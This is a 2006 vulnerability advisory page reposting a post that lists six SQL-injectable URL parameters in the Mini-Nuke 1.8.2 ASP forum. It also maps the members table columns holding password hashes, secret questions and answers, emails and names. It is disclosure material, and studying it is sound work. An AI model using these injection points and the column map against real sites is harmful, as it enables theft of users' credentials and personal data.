Computer Security

Security Advisory: Mini-Nuke<=1.8.2 SQL injection (6)
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [eVuln] PHP SimpleNEWS, PHP SimpleNEWS MySQL - Authentication Bypass Vulnerability

  [SA19290] OSWiki Username Script Insertion Vulnerability

  ASPPortal <= 3.1.1 Multiple Remote SQL Injection Vulnerabilities

  Free Articles Directory Remote Command Exucetion

From:dabdoub_mosikar_(at)_forislam.com <dabdoub_mosikar_(at)_forislam.com>
Date:22.03.2006
Subject:Mini-Nuke<=1.8.2 SQL injection (6)

//mini-nuke board turk have many sql injection founded by Moroccan Security
Team
//Creetz to: Moroccan Security Team
[Dr.E-vil,Dr.Erase,H0550N,|ucifer,DaBDouB-MoSiKaR       [OverclockiX],ki11er]
,Dranzelz,Esp!onLeRaVaGe,ameer,www.lezr.com and all muslim [morocco]
[1]
http://[target]/members.asp?action=member_details&uid=|sql|
[2]
http://[target]/articles.asp?action=articles&catid=|sql|
[3]
http://[target]/hpages.asp?id=|sql|
[4]
http://[target]/programs.asp?action=programs&catid=|sql|
[5]
http://[target]/forum.asp?action=Topics&id=|sql|
[6]
http://[target]/pages.asp?id=|sql|
/////////////////////////////////////////////////////////////////
Help table name

Columns of members
sifre=password md5
uye_id = userid
g_soru = secret question.
g_cevap = secret answer
email = mail address
isim = name
//////////////////////////////////////////////////////////////////

About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru